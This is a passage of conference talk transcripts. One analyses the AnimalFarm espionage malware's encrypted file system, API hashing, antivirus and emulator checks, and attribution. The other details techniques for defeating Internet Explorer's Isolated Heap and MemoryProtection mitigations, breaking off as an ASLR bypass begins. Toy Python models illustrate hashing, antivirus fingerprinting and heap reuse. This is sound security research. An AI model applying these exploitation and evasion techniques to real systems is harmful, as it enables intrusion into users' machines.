Back to ramFS: these chunks are kept in a linked list, for which we got a head pointer and a tail pointer inside the ramFS object at offset B8. So the head and tail pointers point to the beginning and the end of this linked list. And each item of this list is actually the address of a chunk header. The chunk header is a structure containing, in the first field, the address of the chunk, and in the second field the key that serves to encrypt and decrypt the chunk. So each chunk could theoretically be encrypted with a different key. And finally, the chunk content address points to the 512 bytes of encrypted data. So that's the way ramFS looks in memory: a set of encrypted chunks that you can access from a linked list. This is not yet the actual file system structure. The actual file system structure is inside the first chunk. So they decrypt this first chunk when they mount the file system and store the structure at the beginning of the ramFS object. This is the only part that stays decrypted in memory at all times; the rest of the file system is always encrypted and decrypted on demand only. Interestingly, we got the names given by the developers for three fields in this structure, again because of some error messages in the code. So we know the developers called these three fields the file list, the free chunk block list, and the free file header list. The file list is the only one that is non-empty at the beginning, and like the name implies, it's a list of all the files stored in ramFS. And in this case, we only got one file, the cleaner I just talked about. So we got the name in the structure, a.ini, and the content of the file. The content is a custom command to uninstall Dino from the machine, thanks to a dedicated switch. So basically, ramFS also comes with a custom command handler. And here are a few commands that it can execute inside ramFS: the install command I just showed you; the extract command to take a file from ramFS and put it onto the real file system; two commands to execute or inject files stored in ramFS; and a command to kill a running process on the machine. So we can guess that this ramFS thing is really a disposable execution environment for the developers. It always stays encrypted; it's really hard, in terms of forensics, to understand the structure. So that's probably the purpose. And my question is: is this thing custom? Did they copy-paste it from somewhere or not? I couldn't find any implementation like that on the Internet. So I tend to believe it is custom, in particular because of these low-level characteristics: all the file names and file contents are in Unicode; the maximum file name length is 260 characters; the decrypted chunks, once they get decrypted, are manipulated as chunks of 540 bytes this time, which is not so common as far as I know; and I couldn't find any metadata on files, so they don't seem to have any timestamps of creation, last modification time, or things like that. So I believe ramFS is custom. But once again, if you recognize this thing, I would be happy to know. And now: so, we spoke about a lot of different malware samples and so on, and now I'm going to try to explain the different links we found between each of them, the similarities, and why we think it's the same, or more or less the same, group of developers behind them. So the first thing we mentioned is API obfuscation: basically, every cartoon sample uses the same techniques to obfuscate APIs.
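Before getting into those shared techniques, here is a toy model of the ramFS idea described above: a "file system" kept as 512-byte encrypted chunks that are only decrypted when a file is read. The XOR cipher, the layout and the file content are stand-ins for illustration, not the real ramFS implementation.

```python
import os

CHUNK = 512

def xor(data, key):                      # stand-in cipher, not what Dino uses
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

class ToyRamFS:
    def __init__(self):
        self.chunks = []                 # list of (per-chunk key, encrypted bytes)
        self.files = {}                  # file name -> list of chunk indexes

    def add_file(self, name, content):
        idx = []
        for off in range(0, len(content), CHUNK):
            key = os.urandom(8)
            plain = content[off:off + CHUNK].ljust(CHUNK, b"\x00")
            self.chunks.append((key, xor(plain, key)))   # stored encrypted
            idx.append(len(self.chunks) - 1)
        self.files[name] = idx

    def read_file(self, name):
        # only the chunks belonging to this file are decrypted, on demand
        return b"".join(xor(enc, key) for key, enc in
                        (self.chunks[i] for i in self.files[name])).rstrip(b"\x00")

fs = ToyRamFS()
fs.add_file("a.ini", b"<uninstall instructions would live here>")
print(fs.read_file("a.ini"))
```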
For the API obfuscation, they load the library, walk the DLL's export table in memory, take the list of exported functions and generate the hash of each exported function name to find the wanted hash. So we found two different algorithms. Here is, for example, the algorithm used by Bunny and Casper; I'll sketch it below. It's really easy: it's simply a ROL and a XOR. On the slide I put a Python script and, as an example, the hash of the CreateProcess function. So another similarity between the samples is the way of antivirus detection. In each cartoon, the developers use a WMI provider to find the antivirus installed on the system. So they use root\SecurityCenter, or root\SecurityCenter2 on newer Windows systems, make a SELECT * FROM AntiVirusProduct query to get the antivirus name, installation date and so on. And in fact, they use only the first word of the security product's name: for example, if you look at G Data, it's only the "G" and not "G Data"; it only takes the first word. And they make a hash of it, store the hash inside the binary, and check whether the installed antivirus is this one. Just for information, for the three last hashes we didn't find which antivirus is detected; we couldn't find the name. So if by any chance you have an idea, or have a huge database of hashes, maybe you could help us to have a full list of the detections. So another fun thing about the cartoon samples is the emulator detection. Something really fun is the last one: if you look, ea, f, y, et cetera, it's a random name generated by a Kaspersky product. But the developer hardcoded that random name inside the binary. So I think he made a test, got this name, hardcoded this name, and didn't check a second time. And you've got a list of other random names potentially generated by the Kaspersky emulator. Is this working? Can you hear me? Awesome. At this point, I'd like to thank a researcher, who wants to stay anonymous, who dedicated his spare time to reverse engineering antivirus emulators. And coincidentally, he saw my paper on Bunny and said: oh, that string, wait, I saw that before, it's Bitdefender. But the other string, that doesn't make sense, like the Kaspersky one. And then he sent me this list of names that he extracted from the Kaspersky emulator and said: this is a random string, this shouldn't be hardcoded. I thought it was hilarious. Another link and similarity between the samples is the internal ID of the malware. If we look at these numbers, they seem to be really similar. For example, on the CSEC slide, the Babar sample mentioned is 08184; we don't have it. But for the samples we analyzed, the Dino, Bunny, Babar, etc., the naming convention seems to be more or less the same. So, it's purely speculation, but maybe the first two numbers match the year of creation and usage of the malware. On the CSEC slide, it's 2008, and 2011, 2012 and 2013 for the other samples. But we don't have any proof; it's simply speculation, and maybe it's the ID and the version, or the campaign ID, or something like that. I don't know. Another link between the samples is of course the naming convention, because all the names we mentioned, Babar, Casper, Bunny, etc., are the internal names chosen by the developers. It's not our naming convention. So in every case, they chose more or less cartoon characters to identify the malware. Another link between the samples is a really, really bad English usage all over the binaries, as you may see. So, for example, if you look at the string of the registry key, you have a mistake in the middle, and Marion has a thing about these errors. I think you can mention it.
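Here is a sketch of those two shared fingerprints, the ROL/XOR hash and the "first word of the product name" check. The rotation count, the XOR constant and the known-hash list below are placeholders rather than the real values from the binaries; only the shape of the computation follows the description above.

```python
def rol32(v, n):
    return ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF

def api_hash(name, rot=7, xor_key=0x5D2E3F1A):       # constants are made up
    h = 0
    for c in name:
        h = rol32(h, rot) ^ ord(c)
    return h ^ xor_key

print(hex(api_hash("CreateProcessW")))

# AV detection: ask WMI which product is installed, keep only the first word
# of its display name ("G" for "G Data AntiVirus"), hash it and compare it to
# the hashes stored in the binary.
WQL = "SELECT * FROM AntiVirusProduct"               # run against root\SecurityCenter2
KNOWN_AV_HASHES = {api_hash(w) for w in ("Avast", "Bitdefender", "G")}

def av_is_known(display_name):
    return api_hash(display_name.split()[0]) in KNOWN_AV_HASHES

print(av_is_known("G Data AntiVirus"))               # True
print(av_is_known("Some Unknown AV"))                # False
```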
Yes, so the typos in the binaries were hilarious. If you look at the yellow-marked part, it's a quite normal-looking string, until you realize there's one letter that should be different. Anyway, I was looking at the Bunny binary and initially I saw these strings, of course, and I was like, okay, this binary does something with the registry and maybe something with IPsec, because it's accessing the Microsoft IPsec key, whatever. I have no idea about IPsec. So I was looking at how Microsoft interacts with IPsec and what the binary could do with the registry when modifying IPsec in there. And then I realized that there is a name in there that is written wrongly. This shouldn't work, but when the binary ran, it would work. So I thought maybe it's trying something and has a bug in there. And then I realized that what it is writing to this registry key is actually its configuration, and not anything related to IPsec. So if they hadn't placed a typo in the name, I would maybe have been researching IPsec forever; but because they placed a typo, I saved time, which I found was great. And another, even stronger link between them is that we found a C&C, horizons-tourisme.com. It's a travel agency in Algeria, I think. Yeah, it's in Algeria. And we found a directory listing on the C&C, and we were able to list every file and directory. And we found a directory for several different malware families. For example, D13 is the directory used by the Dino malware, and 13 is the version of Dino. And on the same server we've got BB 28 for Babar, and we've got TFC for Tafacalou; it's one of the samples developed by the group. And just for information, in the Kaspersky report you have some information about Tafacalou. It's an Occitan word that means "it's getting hot", basically, and it's presented as a link to French developers. But I'm French, and I had never heard this word before the Kaspersky article. So the link with French speaking, for me, is a little bit exaggerated. And that's why I'm going to speak about attribution now, about this case. A lot of articles, people, et cetera, point to French developers. And they decided, for me, to clearly manipulate information to point to French developers. The Tafacalou stuff, for example, or the "titi": if you look at the slide, titi is a diminutive for Thierry. Yeah, maybe, but I'm not convinced. And a term that means small people. I never heard the usage of "titi" in French to identify small people. So for me, it's not really true. We got the idea that Canadians maybe don't speak real French. Canadian French. So maybe people at the back cannot read the graph, but I decided to list every C&C and check which country is used for the C&C. Typically, we found a Syrian website, an Iranian website, an American website, Burkina Faso (the .bf), Hong Kong, Saudi Arabia, Egypt, Turkey, Niger, Morocco, and Ukraine. Basically, among the C&Cs we identified compromised websites, like the Syrian government website; we found a university, companies, and sometimes it was a fake website. And not always, typically not for the Syrian government, but most of the C&Cs were WordPress websites. So maybe the developers used some vulnerability in WordPress to drop the C&C panel, et cetera. There was another interesting story about the CNC. So one of the Babar binaries has a CNC server which is hosted on an Algerian travel agency website. So I didn't think this was anything suspicious, but one day my boss poked me about this website, he's Algerian, and he said, there's no travel agency in this place in Algeria.
So he basically said: in Algeria, you don't really travel nowadays, there's no need for travel agencies, and in the location, the village, where this travel agency says it's located, he doubts that there's a travel agency at all. And even if there is a travel agency, it's improbable that this travel agency hosts its web server with a United States hoster. So we genuinely believe that these websites are fake. So here is the map of the locations of each C&C. For China it's only Hong Kong, but I cannot simply draw Hong Kong on the map, so that's why it's all of China. Yeah. So I explained that some reports point to France based on bad arguments, but we found some more relevant French hints. For example, in the HTTP requests generated by the malware, the Accept-Language is set to fr. Another example is that the compiler language is set up as French, as the second screenshot shows. And another thing: in Casper, I think, or in Dino, the developers did not remove the compilation path of an arithmetic library, and it was written in French and not in English, with a "c" at the end. So, of course, all of these elements can be forged, and I can set up my compiler in a lot of languages and manipulate the data, but it's simply a fact for us. And finally, the other information for attribution is the CSEC slide, where the agency points to a French intelligence agency for the Snowglobe campaign. Yeah, at this point I'd like to say a short thank you to the Canadian intelligence agency for providing these slides. I'm very sorry. Very sorry. They actually got leaked, but they helped us a lot in our research. Yeah, but everybody knows that attribution is not so easy. And the journalists that covered the case, in France in particular, are really good at bad attribution. For example, a newspaper said that Jean, this French guy, is a Canadian guy. Too bad. And for example, Marion, from Austria: a journalist, a French journalist, doesn't really know the difference between Austria and Australia, so he made a mistake. I may be one now, but usually we Austrians have the problem that we get confused with Germans, which is not directly an insult, but it is an insult. And calling us Australian is even worse. I mean, this is a different continent. So yeah, attribution is not so easy. So thank you for your attention. Just for information: we will provide the final slides to the organizers, and you will have a link to all our articles, a list of hashes of the analyzed samples, et cetera. And yeah, that's all. If you have any questions, you can ask us now or later at the bar. Thank you.
|
For some months now, there have been rumors of cartoon-named malware employed in espionage operations. It actually started in March 2014 with a set of slides leaked from the Communications Security Establishment Canada (CSEC), Canada's equivalent of the NSA. CSEC there described to its spook friends a malware dubbed Babar by its authors, which they attributed "with moderate certainty" to a French intelligence agency. The group behind Babar is now commonly referred to as "AnimalFarm" in the antimalware industry, because Babar was only a small piece of a much bigger puzzle. Since the CSEC slides' publication, a group of valorous adventurers, animated by the thrill of understanding complex malware operations, has been relentlessly following AnimalFarm's trail. Along its path, this group found several pieces of AnimalFarm's arsenal, for example stealthy Casper, exotic Bunny and even big-eared Babar itself. This presentation aims at presenting the results of this group's research. In particular, we will provide a global picture of AnimalFarm's operations, and also delve into technical quirks of their malware. We will also explain how we assessed the connections between their various pieces of software from a code reverse-engineering perspective, and what technical hints we found regarding attribution.
|
10.5446/32804 (DOI)
|
Alright everybody, this is Abusing Silent Mitigations: understanding weaknesses in Internet Explorer's Isolated Heap and MemoryProtection mitigations. We've got a lot to cover, so we're just going to dive right in. So today we're going to go over a comprehensive set of research we did in mid-2014 related to the Isolated Heap and MemoryProtection mitigations that were introduced to make UAF exploitation harder in Internet Explorer. It'll cover several attack techniques against Isolated Heap and some surgical tools to use against MemoryProtection, along with details of the ASLR bypass that was achieved using MemoryProtection. Then we'll follow it up with the recommended defenses that we provided Microsoft. This research was awarded $125,000 from Microsoft's bounty program. It is still the highest payout from the Microsoft bounty program. It also included the first payout for the defense side of the bounty program, and we're going to go over all of those details today. So a quick overview: we all work for HP's Zero Day Initiative program. It's the world's largest vendor-agnostic bug bounty program. We focus on purchasing vulnerabilities from researchers all over the world, we focus on getting those bugs fixed, and we research advanced exploitation techniques. My name is Brian Gorenc. I actually run the Zero Day Initiative program. I spend most of my time doing root cause analysis on cases that come in and doing internal vulnerability discovery. I also organize the Pwn2Own hacking competitions around the world. Because of those jobs, I get to work a lot with HP's legal organization, especially with Wassenaar and stuff like that. Doing Pwn2Own is a lot more fun than it used to be. And let me introduce Abdul. So I'm Abdul. I'm a security researcher working for ZDI. I've been working for HP Security Research for the past two years, and I do a lot of root cause analysis and bug discovery. Simon? Hi, I'm Simon Zuckerbraun. On Twitter, I'm HexKitchen. I'm with ZDI. I've been with them for a little over a year. I do a lot of work with Internet Explorer. Yes. So it should be no surprise to anybody in this room that use-after-free vulnerabilities were a very popular choice for attackers who were targeting government websites and the people who were visiting those sites, using them in watering hole attacks. What you see here on the slide is a bunch of CVEs that were being used publicly, or known about publicly. And really, something had to be done. Every single month, it seemed that a new attack was coming out that was leveraging a use-after-free in Internet Explorer. And finally, Microsoft did do something in mid-2014 to make attacking use-after-free vulnerabilities a little bit harder, and as a result, it seems that attackers have shifted away from use-after-frees in Internet Explorer and are now focusing on Flash vulnerabilities. So what exactly happened? Well, in MS14-035, they introduced Isolated Heap, which Abdul will go over. And the month following that, they introduced MemoryProtection, which was a nice addition to Internet Explorer to make use-after-frees harder to exploit. The side effect that it had, really, was that it made IE fun to research again. We were receiving a lot of use-after-free vulnerabilities into the Zero Day Initiative program, and it was pretty much: you hit the website and the use-after-free happens; relatively easy to analyze, relatively easy to exploit.
And this made it more fun to actually go and analyze those cases; it made it a little more complicated. So this is the first time that we've ever actually shown some of our submission trends into the program. You can see that over 2012 and 2013 we've got somewhere in the teens coming into the program every month, vulnerabilities in Internet Explorer. And we see a spike in early 2014, and this is because researchers all around the world were developing DOM fuzzers and basically sending their output to us for purchase. And so, for several months there, we were doing about 40 cases, high 30s, every month: analyzing, purchasing and submitting to Microsoft. And you see in mid-2014 a drop, and that's when Isolated Heap and MemoryProtection came out. And we've kind of leveled off around 25 zero days in IE coming through our program every month. So it keeps us busy; IE is one of our main vulnerability sources. Talking about the research timeline a little bit before we dig into the attacks: you can see all the key dates related to the research. I think some of the more important dates are that we had the Isolated Heap proof of concepts generated basically in under 10 days after the patch. Same with the surgical tools that we use against MemoryProtection: in the cases where they can be used, they were developed in under 10 days. We had our first working ASLR bypass against MemoryProtection, or rather using MemoryProtection, in early September. We were awarded the $125,000 in November, and we kind of waited to disclose any of the details while we worked out payments to charities. We donated all of the money that we won from the bounty program to three STEM organizations, to encourage research and engineering. And we made the public announcement in February. In April, Microsoft came to us and said that they would not fix the issues that we've discovered and would not be using any of the recommended defenses that we provided. So here we are, sitting today at Recon, releasing all the details and all the proof of concepts that we've provided. We'll talk about where to get all of those at the end of the presentation. And so I'm going to hand it over to Abdul. He's going to go over all of the research related to Isolated Heap. So Isolated Heap was introduced in June 2014. Back then we noticed that there's a new heap created with the HeapCreate API, a Windows API. So basically, the main purpose of Isolated Heap was to take a lot of DOM objects and move them to an isolated region, basically providing some kind of separation of DOM allocations from other types of allocations. This was really interesting from an exploitation point of view, because it made things harder: the classical ways of overwriting freed objects, like using strings and stuff like that, would not apply anymore to a lot of DOM objects, because they have been isolated, moved to a separate heap, while the classical string allocations are kept in the process heap. But basically, just like any other mitigation, Isolated Heap is not perfect. It does a good job of isolating certain allocations, but at the same time it allocates all the DOM objects in one heap. So basically, an attacker can free one of these objects and then overwrite it with whatever he wants, whatever type he wants.
The attacker can also overwrite that object with another object of a different size, so it doesn't have to be of the same exact size; it can be smaller or bigger. So the attacks on Isolated Heap are very specific, like bug-specific; basically, they are highly dependent on the offset being dereferenced at crash time. So most of the attacks that I'm going to be discussing in my next slides will be related to the type confusion issues and other misalignment issues. So the first attack I'll be discussing is the aligned allocation attack technique. Basically, it's nothing more than: you have a freed isolated object, you free it and you allocate another isolated object at the same exact spot. The only challenge here is what type of object you would actually allocate instead of that object. This scenario, or this attack, works well when you have a bug that dereferences a high offset. So basically, you can always choose or find another object where you can control, or have partial control of, certain values at high offsets. To have this attack working properly, we need to avoid the Low Fragmentation Heap. The reason for that is that we're probably going to be allocating objects of different sizes, and we don't want to end up having these allocations in different buckets; we want to have them in the same exact bucket. So the simplest way to achieve this, in a nutshell: we have to trigger some freeing conditions, that is, we have to free that specific object. Then, in case we want to allocate a bigger object, we have to massage the heap in order to free multiple chunks, multiple free chunks. Later on, we have to coalesce all the free chunks together into one big chunk. Then we have to place certain objects, or replace that specific object, with whatever object we want. We can do it with a bigger object, we can do it with a smaller object, it doesn't matter; it depends on whatever scenario we have. And finally, we trigger the reuse. So this is my fancy graph here. It shows we have a CTableRow object, and up front we have a CDOMTextNode. These are isolated, basically, in this specific example. The CTableRow, the free happens on that specific object, and then what we did is we overwrote it with a CDOMTextNode. The reason why we chose a CDOMTextNode is that in that specific case the bug was dereferencing, I guess, offset 0x30, and the CDOMTextNode contains an interesting value at offset 0x30 that we can partially control. (There's a small sketch of this type-confusion idea coming up in a moment.) So this is the WinDbg dump, a before and after: basically it shows the CTableRow before being freed and overwritten, and later on we overwrote it with a CDOMTextNode. Highlighted in yellow is the offset that we're targeting. So basically the CDOMTextNode contains at that specific offset the value 40000, which can be sprayed; so basically we partially control that offset. So this is crash time: when we have a successful overwrite and then we trigger the reuse, we're going to have, at crash time, a dereference of 40000, as you guys can see. So from there an attacker can spray that address and then control the flow of execution. So the second attack technique that I'll be discussing is the misaligned allocations attack technique. The aligned attack technique works well for high offsets, but in case we have a use-after-free that dereferences a low offset, that can be kind of problematic.
Because we don't have a lot of choices when it comes to DOM objects that we could overwrite it with that have specific low offsets that we can control or partially control. So basically the idea is: if we have an object that's allocated at, let's say, address X, then we probably have to start allocations at X minus n, and then we're going to have one of the objects at X minus n being misaligned against the original object; and then we're going to trigger a use, and we're going to have an offset being dereferenced from the misaligned object. So the simple steps are: basically, influence the heap to coalesce a lot of free chunks together into one big free chunk. Later on, we have to spray random objects inside that big free chunk, but in a way that we're going to have one of the objects misaligned against the original object. And later on, we're going to trigger the reuse and have it dereference something from the misaligned object. So again, this is my fancy graph here. Basically we have a CTableRow, and at the front we have a CButton object. Both are isolated. This bug targets the CTableRow object. Basically what we did is we freed a whole bunch of objects, coalesced all the free chunks together into one big chunk, and then we started spraying random objects, and at a specific spot we had the CButton misaligned against the original CTableRow, and then we dereference an offset from the CTableRow. So basically, if your bug dereferences, let's say, offset X from the CTableRow, you're going to have it dereferencing something different; it's not the same offset in the CButton. So basically, in a nutshell, we need to stabilize the heap in a way that produces the same exact free chunk of the same size every time, and then we're going to have to spray it with random objects. Basically, in my specific example, we were able to stabilize the heap with this specific code. It's not generic code that will always produce a free chunk of the same size, it was bug-specific, but it worked every time. In that specific example we had EDI pointing to the middle of the free chunk, and later on we're going to see how it works. The free chunk is of size 0x110; it was always producing the same 0x110 free chunk. So as you guys can see, this is crash time: EBX comes from EDI, and EDI points to the middle of a big free chunk of size 0x110. Later on we're going to see when we get control. So, assuming that we were able to stabilize the heap in a way that gives us the same free chunk of the same size every time, we would then need to actually spray it with a bunch of objects. In this specific example I chose to target, to have, a misaligned CButton object, because at a certain offset it contains a value that I can spray. We can do it in a bunch of ways, we don't have to do it with a CButton; someone can argue that they can do it with a text area and then set some coordinates and have it working. But the idea here is just to have a misaligned object against the original object. This one worked well, though. So this is crash time: actually we had EDI plus 0x1C pointing to 0x12C00400; it lands on that specific value, which is at an offset of the misaligned CButton object. And as you guys can guess, this value can be sprayed easily, and then we can gain control. So, in a nutshell, just to wrap it up: Isolated Heap does a good job isolating certain objects from other allocations, but it's not perfect. We still have a lot of type confusion issues, and we still have misalignment issues.
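Here is the promised toy model of the type-confusion idea behind the aligned variant (the misaligned variant is the same trick with the replacement object starting a few bytes earlier). The "heap", the sizes and the offsets are all invented; it only illustrates why a stale pointer plus a differently typed replacement object equals attacker-influenced data.

```python
class ToyHeap:
    """First-fit toy allocator standing in for the isolated heap (no LFH)."""
    def __init__(self):
        self.mem = {}             # address -> bytearray backing the "object"
        self.free_list = []       # (address, size); coalescing omitted for brevity

    def alloc(self, size, fill):
        for i, (addr, free_size) in enumerate(self.free_list):
            if free_size >= size:             # a freed chunk gets reused
                del self.free_list[i]
                break
        else:
            addr = 0x10000 + 0x200 * len(self.mem)
        self.mem[addr] = bytearray([fill]) * size
        return addr

    def free(self, addr):
        self.free_list.append((addr, len(self.mem[addr])))

heap = ToyHeap()
row = heap.alloc(0x90, 0x11)      # the "CTableRow" the buggy code keeps a pointer to
heap.free(row)                    # the object is freed, the stale pointer survives
node = heap.alloc(0x60, 0x44)     # a differently sized "CDOMTextNode" replaces it
assert node == row                # same spot on the isolated heap
print(hex(heap.mem[row][0x30]))   # the stale dereference now reads 0x44-controlled data
```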
To finish the wrap-up: attacking Isolated Heap depends on several factors. It's more bug-specific, we have to avoid the Low Fragmentation Heap as much as possible, and it depends on the offsets that are being dereferenced. So I'm going to give it back to Brian to discuss MemoryProtection. All right. So MemoryProtection was introduced in July of 2014, and in the months after that, I think in the patch the month after that, they made some improvements to MemoryProtection. What we noticed in the Zero Day Initiative is that we were analyzing cases, and when that July patch came out, we started to see that the cases that we hadn't purchased yet were turning into null pointer dereferences, which was really interesting to us. So we dug more into that, and we found MemoryProtection messing with the use-after-frees that we were looking at. So we had to figure out what exactly MemoryProtection is. MemoryProtection is a delayed-free mechanism inside of Internet Explorer, and its purpose is to prevent blocks from being deallocated while they're referenced either on the stack or in processor registers. It keeps these blocks in a zeroed-out state so that they're unusable, and it adds them to a wait list. And every so often a reclamation process will occur: it will go through that wait list of blocks and free, at the heap manager level, the ones that are no longer referenced. And the way that they actually implemented this is that instead of calling HeapFree on these objects, they call ProtectedFree on these objects instead. So we kind of need to understand how the ProtectedFree function works. The first thing it does when ProtectedFree is called is it checks the wait list and checks to see if it's full. If the wait list is full, it will go ahead and perform the reclamation sweep, cleaning up the objects that are no longer referenced. After that it will add the current block to the wait list, zero it out and return to the caller. If the wait list is not full, which is the case almost all of the time, it will check the aggregate size of the blocks on the wait list. If that aggregate size is over 100,000 bytes, it will then perform a reclamation sweep, add the block to the wait list, zero it out and return to the caller. If, for example, the threshold has not been met, it will add the block to the wait list without performing the reclamation sweep, zero out the block and return to the caller. So when we look at this, the most important thing that we need to know about this function is that we can ignore the first check as an attacker, because we have control of the allocations that are going on; what we're going to focus on is the 100,000-byte threshold. The most important thing to know is that the reclamation sweep always occurs before the new block is added to the wait list, and that's what we're going to leverage later on when we're trying to free, at the heap manager level, certain use-after-free conditions. What exactly is the reclamation process? Well, there's that wait list, which contains an entry for every block that has been requested to be deallocated, and in that entry you've got the block base address, you have the block size, and you have a flag that determines whether it's on the isolated heap or the process heap. It will iterate through those entries on the wait list and check to see if there are any references to that block on the stack.
It will check to see if there are any references to that object in the processor registers, and if there are, then the block is wait-listed, or continues to be wait-listed. So after the reclamation sweep the block will still be there, still be zeroed out, still be allocated, and can't be used by the attacker. If no references exist, then the block will be freed at the heap manager level and released back. So, in the cases of a use-after-free where there is a reference on the stack or in the processor registers, MemoryProtection is highly effective: it will keep those blocks allocated so that you can't allocate something underneath them and reuse them in a malicious way. But there's that subset of use-after-frees that aren't referenced anymore, and yet MemoryProtection is still changing the way that the application actually operates, and so it causes the attacker some challenges. So what are the challenges that MemoryProtection presents an attacker for the subset of use-after-frees that are no longer being referenced? Well, first there's the deallocation delay, and this is because there's that reclamation sweep that we're waiting for before the block actually gets deallocated. And then there's the non-determinism that exists because of MemoryProtection. First is the non-determinism produced by what we're calling stack junk, which could be non-pointers or stale pointers that are left over in stack buffers and not cleared after their former use. It may just so happen that those stale pointers, or values that are on the stack, point into an object that you want to be deallocated, and because that stack junk exists, MemoryProtection will not free that object. There's also complexity in determining deallocation time due to the number of objects on the wait list, so your timing could be off, along with complex heap manager behavior due to reordering of the wait list, which will result in unstable conditions, and you kind of need stability for certain UAF situations. So what can we do? Well, the first elementary attack technique is just the generic memory-pressuring loop that's been used in use-after-frees for a long time to force garbage collection, where we'd allocate over 100,000 bytes worth of objects and then free them, forcing reclamation and clearing it out. Well, that definitely defeats the deallocation delay challenge, but it doesn't solve the non-determinism challenge that exists due to MemoryProtection. When we submitted this paper, back in October of 2014, there was an unconditional reclamation step when WndProc was entered to service a message on the thread's main window. This unconditional reclamation step was rendered non-functional by Microsoft post September 2014, so this attack technique, which was basically to delay execution of the exploit until that event happened and that unconditional reclamation occurred, no longer works. Now, use-after-frees are sometimes timing-based, so this doesn't always work anyway; but because Microsoft basically rendered it non-functional, it really doesn't matter. For the record, it's there.
So when you call ProtectedFree on a block at address A, A will definitely not be reclaimed on that call, but it will definitely be on the wait list when the call is complete. So we're going to leverage that fact to make sure we can organize our calls in a way that guarantees that we deallocate the block that we want to use in the use-after-free. We're also going to rely on the fact that it doesn't matter which heap the object is on; it can be on the isolated heap or the process heap. So step one: we want to prep the wait list, and we're going to do this by finding a method to trigger arbitrarily sized buffer allocations. When we find that method, we'll allocate a buffer of 100,000 bytes. We will then free that buffer, which, because of the way ProtectedFree operates, will add that block to the wait list; and at this point we know the next time we call ProtectedFree, it will free the blocks that are ready to be reclaimed. So you can kind of see that's the state of the wait list: at this point we have a set of blocks X on the wait list that are waiting to be freed, if they're not referenced anymore, and there's a block of 100,000 bytes that guarantees we hit the reclamation step on the next call to ProtectedFree. So we're going to trigger another block, and the purpose of these steps is to get the wait list into a known state and an approximate size. So we're going to trigger the allocation of a block of size F. We're going to free that block, so ProtectedFree will be called on that object, and the reclamation step will be performed because we've reached that threshold of 100,000 bytes. It will go through and iterate through that wait list, freeing any block that's no longer referenced by the application on the stack or in the processor registers, and it will also free block A, which will bring the wait list into a consistent state and a good size. After all the freeing is done, it will add block B, which will bring that wait list to a consistent size, and at this point we have a good idea of what the wait list actually looks like. So next we're going to set up the freeing of block C, which is the object that we want to perform our use-after-free attack on, and our purpose now, with these steps, is to cleanly deallocate block C with the minimal amount of additional heap operations. So we free object C, which calls ProtectedFree; we are not over the threshold, so it adds the block to the wait list. Then we allocate that 100,000-byte block. We free that block, but because we're not at the threshold yet, it will just be added to the wait list. We will then allocate another block, which will put us over the threshold and trigger the reclamation step on the next call to ProtectedFree; and at this point, when we call free on object E, we will be freeing object C and object D, reliably. We then know exactly when we are able to deallocate object C. We can then use the isolated heap techniques that Abdul talked about to perform our use-after-free attack against object C. You can see what the wait list looks like at that point. But we need that method for arbitrarily allocating objects and arbitrarily freeing objects. We can't really rely on SysAllocString- or SysFreeString-based string buffers, because they don't use ProtectedFree, and that's what we need.
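To make that bookkeeping concrete, here is a small Python model of the wait list. This is a sketch of the behavior just described, not Microsoft's code: sizes and addresses are arbitrary, the "wait list full" check is omitted, and the stack/register scan is reduced to a set of addresses. Because the sweep runs before the current block is appended, block C is released exactly on the final call.

```python
SIZE_THRESHOLD = 100_000

class MemProtect:
    def __init__(self, referenced=()):
        self.wait_list = []              # (name, base, size) entries
        self.referenced = set(referenced)
        self.released = []               # blocks actually freed to the heap manager

    def protected_free(self, name, base, size):
        if sum(s for _, _, s in self.wait_list) > SIZE_THRESHOLD:
            self._reclaim()              # sweep happens before wait-listing
        self.wait_list.append((name, base, size))

    def _reclaim(self):
        keep = [e for e in self.wait_list if e[1] in self.referenced]
        self.released += [e[0] for e in self.wait_list if e[1] not in self.referenced]
        self.wait_list = keep

mp = MemProtect()

# Step 1: get the wait list into a known state.
mp.protected_free("A", 0x0A000000, 100_001)   # big block A
mp.protected_free("B", 0x0B000000, 0x60)      # this call sweeps A (plus stale blocks)

# Step 2: free the UAF target C with minimal extra heap noise.
mp.protected_free("C", 0x0C000000, 0x90)      # target block, only wait-listed so far
mp.protected_free("D", 0x0D000000, 100_001)   # big block D pushes past the threshold
mp.protected_free("E", 0x0E000000, 0x60)      # this call reclaims C and D

print(mp.released)    # ['A', 'B', 'C', 'D'] -> C is released exactly when expected
```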
So, for that method, CStr comes to our aid in MSHTML: we can use the DOM method getElementsByClassName, and in that method it will create a CStr using the string value passed in, and later it will deallocate that string using ProtectedFree. And that's what we're going to use for the arbitrary allocation and deallocation of objects and for manipulating the wait list in MemoryProtection. To do this, you actually have to do a priming procedure against the DOM object, and we'll talk about it in a second. And really, the only limitation to this is the fact that there is a limitation on the size of the object: the smallest buffer you can use in a CStr is 0x56 bytes, but there is no upper limit, so we can be guaranteed that we're going to hit that threshold of 100,000 bytes in that check inside of ProtectedFree. So what does the code look like? Well, this is it. Pretty simple. First, we're going to create a DOM object. The priming procedure is basically calling getElementsByClassName with the string that you're going to use later and keeping a reference to the returned value; then any subsequent call to getElementsByClassName using that string will reliably allocate a CStr of a known size and deallocate that same object using ProtectedFree. And as a result, we can now take the steps that we laid out previously to reliably deallocate an object that is not completely mitigated by MemoryProtection. We'll show you a video of one of the proof of concepts that we provided Microsoft, for one of the cases that we had submitted, one of our researcher cases, that we took to controlling a register. Basically it's using that getElementsByClassName technique to reliably deallocate that object, and then using the isolated heap techniques, the aligned allocations that Abdul talked about, to get control of the EIP register. So now I'm going to hand it over to Simon, and he will go over bypassing ASLR and also the recommended defenses. Okay, in this section we're going to talk about how we were able to abuse MemoryProtection to get a bypass of ASLR. So after I got comfortable with these techniques of making precision modifications to the MemoryProtection state, I went back and I started thinking some more about something I'd read in a blog post by Fortinet back in July of 2014. To paraphrase from that blog post: back in 2013, Dion showed how conservative garbage collectors used by script engines can be attacked to leak information about heap addresses. So does MemoryProtection provide a new surface for a similar attack? That's an interesting idea. In a sense, MemoryProtection acts like a conservative garbage collector, freeing allocated memory only if no references are found on the stack. This means that it might be susceptible to an attack similar to the garbage collection attack done by Dion. The key idea here is that when MemoryProtection examines values on the stack, it doesn't understand anything about the semantics of those values; it treats each DWORD as if it is potentially a pointer. So if we'd like, we can plant a chosen value on the stack, and MemoryProtection will interpret it as a pointer. MemoryProtection will then exhibit different behavior depending on whether or not the integer that we chose corresponds to an address of wait-listed memory. Here we see a block of memory that is wait-listed. So let's say we 